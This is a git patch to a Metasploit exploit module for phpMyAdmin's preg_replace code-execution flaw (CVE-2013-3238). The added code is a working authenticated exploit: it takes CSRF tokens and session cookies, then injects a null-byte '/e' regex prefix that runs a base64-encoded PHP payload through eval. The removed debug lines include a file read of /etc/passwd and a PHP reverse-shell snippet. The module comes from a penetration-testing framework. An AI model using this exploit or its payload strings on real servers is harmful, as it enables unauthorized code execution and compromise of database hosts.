From 9ad19ed2bfa715b43936fcb81f5d80fb31dcaa8b Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 26 Apr 2013 15:41:28 +0100 Subject: [PATCH] Final tidyup --- lib/rex/proto/http/response.rb | 2 +- .../multi/php/phpmyadmin_preg_replace.rb | 115 +++++++++--------- 2 files changed, 59 insertions(+), 58 deletions(-) diff --git a/lib/rex/proto/http/response.rb b/lib/rex/proto/http/response.rb index e13d79eb0f..1b638399a7 100644 --- a/lib/rex/proto/http/response.rb +++ b/lib/rex/proto/http/response.rb @@ -59,7 +59,7 @@ class Response < Packet end # - # Returns a cookie value + # Returns a cookie value from the Set-Cookie header # def get_cookie(cookie) unless self.headers.include? 'Set-Cookie' diff --git a/modules/exploits/multi/php/phpmyadmin_preg_replace.rb b/modules/exploits/multi/php/phpmyadmin_preg_replace.rb index 0b2dd124ef..66f3522ecd 100644 --- a/modules/exploits/multi/php/phpmyadmin_preg_replace.rb +++ b/modules/exploits/multi/php/phpmyadmin_preg_replace.rb @@ -11,49 +11,45 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::HttpServer - include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'PhpMyAdmin Authenticated Remote Code Execution via preg_replace()', 'Description' => %q{ - This module exploits a vulnerability in PhpMyAdmin's setup + This module exploits a PREG_REPLACE EVAL vulnerability in PhpMyAdmin's + replace_prefix_tbl in libraries/mult_submits.inc.php via db_settings.php }, 'Author' => [ 'Janek "waraxe" Vind', # Discovery - 'Ben Campbell ' # metasploit module + 'Ben Campbell ' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2009-1151' ], - [ 'OSVDB', '53076' ], - [ 'EDB', '8921' ], - [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php' ], - [ 'URL', 'http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/' ] + [ 'CVE', '2013-3238' ], + [ 'PMASA', '2013-2'], + [ 'waraxe', '2013-SA#103' ], + [ 'URL', 'http://www.waraxe.us/advisory-103.html' ], ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { - 'Space' => 4000, # unlimited really since our shellcode gets written to a file 'DisableNops' => true, - # No filtering whatsoever, so no badchars - 'Compat' => - { - 'ConnectionType' => 'find', - }, - 'Keys' => ['php'], + 'Compat' => { 'ConnectionType' => 'find' } + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' }, 'Targets' => [ - [ 'Automatic (phpMyAdmin 4.0.0-RC2 and 3.5.8)', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Apr 26 2013')) + 'DisclosureDate' => 'Apr 25 2013')) register_options( [ @@ -68,19 +64,45 @@ class Metasploit3 < Msf::Exploit::Remote end def check - path = uri('/js/messages.php') - res = send_request_cgi({ 'uri' => path }) + begin + res = send_request_cgi({ 'uri' => uri('/js/messages.php') }) + rescue + print_error("Unable to connect to server.") + return CheckCode::Unknown + end - return CheckCode::Unknown if res.nil? + if res.code != 200 + print_error("Unable to query /js/messages.php") + return CheckCode::Unknown + end - if res.body =~ /pmaversion = '3\.5\.8'/ - return CheckCode::Vulnerable + if res.body =~ /pmaversion = '(.*)';/ + print_status("Server version: #{$1}") + case $1.downcase + when '3.5.8.1', '4.0.0-rc3' + return CheckCode::Safe + when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2' + return CheckCode::Vulnerable + else + if $1.starts_with? '3.5.' + return CheckCode::Vulnerable + end + + return CheckCode::Unknown + end end end def exploit - cookie_names = ['phpMyAdmin', 'pma_mcrypt_iv', 'pmaUser-1', 'pmaPass-1', 'pma_lang', 'pma_collation_connection'] - # First, grab the CSRF token + cookie_names = [ + 'phpMyAdmin', + 'pma_mcrypt_iv', + 'pmaUser-1', + 'pmaPass-1', + 'pma_lang', + 'pma_collation_connection' + ] + print_status("Grabbing CSRF token") response = send_request_cgi({ 'uri' => uri}) if response.nil? @@ -125,49 +147,28 @@ class Metasploit3 < Msf::Exploit::Remote cookie << login.get_cookie(name) << " " end - db_enum = send_request_cgi({ - 'uri' => uri('navigation.php'), - 'cookie' => cookie, - 'vars_get' => { 'token' => token }, - }) - - dbs = db_enum.body.scan(/index\.php\?db=(.*)&/).flatten - start_service() - print_status("Sending request") - pay = Rex::Text.uri_encode(payload.encoded.gsub("\t","").gsub("\n","")) - pay = "include('../../../../../etc/passwd');" - #pay = "print('hello') print 'you'; $ip_addr='1'; print 'hello';" -# pay = Rex::Text.uri_encode('print "test";$s=fsockopen("ssl://",4444);while(!feof($s)){exec(fgets($s),$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);};print "test";') - p pay + db = rand_text_alpha(3+rand(3)) + pay = Rex::Text.encode_base64(payload.encoded) evil = "query_type=replace_prefix_tbl" - evil << "&reload=0" - evil << "&db=#{dbs[0]}" - evil << "&selected%5B0%5D=test" + evil << "&db=#{db}" + evil << "&selected%5B0%5D=#{db}" evil << "&token=#{token}" evil << "&from_prefix=%2Fe%00" - evil << "&to_prefix=#{pay}" + evil << "&to_prefix=eval(base64_decode('#{pay}'))" evil << "&mult_btn=Yes" - response = send_request_raw({ + print_status("Sending exploit payload") + exploit_result = send_request_raw({ 'uri' => uri('db_structure.php'), 'method' => 'POST', - 'data' => evil, + 'data' => evil, 'cookie' => cookie, 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' } - }) + },2) - p response.body[0..100] - if response.body =~ /test1234/ - print_good("win") + if exploit_result + print_error("Response retrieved from server, exploit failed.") end - - sleep(30) - - end - - def on_request_uri(cli, req) - php = "" - send_response(cli, "") end end